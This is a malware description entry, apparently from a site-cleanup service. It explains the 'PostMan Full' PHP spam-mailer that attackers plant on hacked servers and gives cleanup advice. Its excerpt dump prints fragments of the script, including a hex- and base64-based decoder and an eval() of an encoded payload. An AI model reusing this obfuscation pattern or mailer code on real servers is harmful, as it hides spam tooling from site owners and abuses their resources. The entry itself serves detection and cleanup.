Mailers is a category of scripts that hackers install on compromised servers to send out spam and anonymous emails.
They take advantage of the servers' bandwidth and other resourses to send out tons of spam emails in a short time. Moreover, headers of such emails don't contain traces of the hackers - they lead to the hacked server -
so all the spam campaign remains quite anonymous. Hacked servers is not a scarse resourse and spammers don't care much if one of them gets blacklisted for spamming they can easily move to another server. However, to minimize risks of
blacklisting, they usually evenly distribute mailing between several hacked servers.
Pastman Full is a sophisticated mailing script. It is based on the PHPMailer class created by Brent R. Matzelle and used by lots of legitimate software. A copy of this class is included in the Pastman in the ecrypted form.
The main purpose of Postman Full is mass mailing (email spamming). It provides comvenient interface for spammmers. For example, lists of recepients can be specified manually in a special edit area or extacted from local and remote files.
The same applies to the message of the emails.
Affecting
Any servers with enabled PHP';
$cleanup='Delete the mailer script and scan your server for other types of malware and specifically for backdoors. Make sure to identy and close the security hole.
You also need to check if your server IP address got blacklisted by various anti-spam blacklist providers as a result of hacker activity.
You can also sign up with us and let our team remove the malware for you.
Dump
...typical excerpts from various mailer scripts..
...
// PostMan Full 3.5
// by dr.kenpeter@yahoo.com
/* <![CDATA[ */
...
/* ]]> */
// <H4ck3rDr381 AT yahoo DOT com>
//
// YOUR PASSWORD IS ONLY YOURS!
// WITHOUT IT YOU CANNOT RUN THE SCRIPT!
// KEEP IT WITH YOU AND DON'T SHARE IT!
// --
// SUA SENHA EH SOMENTE SUA!
// SEM ELA, VOCE NAO PODE RODAR O SCRIPT!
// MANTENHA ELA CONSIGO E NAO COMPARTILHE-A!
...
// Default Method Config
define("_DEFAULT_BASIC_", "mail"); //options are: smtp, mail
define("_DEFAULT_LIST_", "file"); //options are: textarea, url, file
define("_DEFAULT_LIST_START_", 1); //the email to start sending the list. 0 and 1 for no use.
define("_DEFAULT_MESSAGE_", "file"); //options are: textarea, url, file
define("_SCRIPT_VERSION_", "Full 3.5-insec");
...
<title><?=os("PostMan " . _SCRIPT_VERSION_ . "." . rand(0,10) . " by Hackerdre81 <Hackerdre81 at yahoo dot com>")?></title>
....
<body onload="loadFunctions();">
<h1><?=os("PostMan " . _SCRIPT_VERSION_ )?></h1>
<h2><?=os("by Hackerdre81 - hackerdre81@yahoo.com
...
${0} = "x75x6ex65x63x72x79x70x74";
function unecrypt($string, $pass)
{
${1} = "x62x61x73x65x36x34x5fx64x65x63x6fx64x65";
${2} = ~(${1}(str_replace(array("", "@", "(", "^", ")", "[", "#", "<"), array("0","a","o","b","r","l","0","M"), $string)));
echo "<h2 class='h2green'>Patched by XXXXX</h2>rn";
return str_replace(array('$a =', 'unset($a);'),array('# $a =', '# unset($a);'),${2});
}
...
####!DELIMITER!####
eval(${0}("x38x76x58x79x39x66x4cx31x32x35x37x66x77x74x2bx2fx6dx5ax40x54x6d"
. "x71x43x59x6dx28x75x67x6ex4ax43x52x69x35x71x52x69x34x7ax58x6ex4a"
....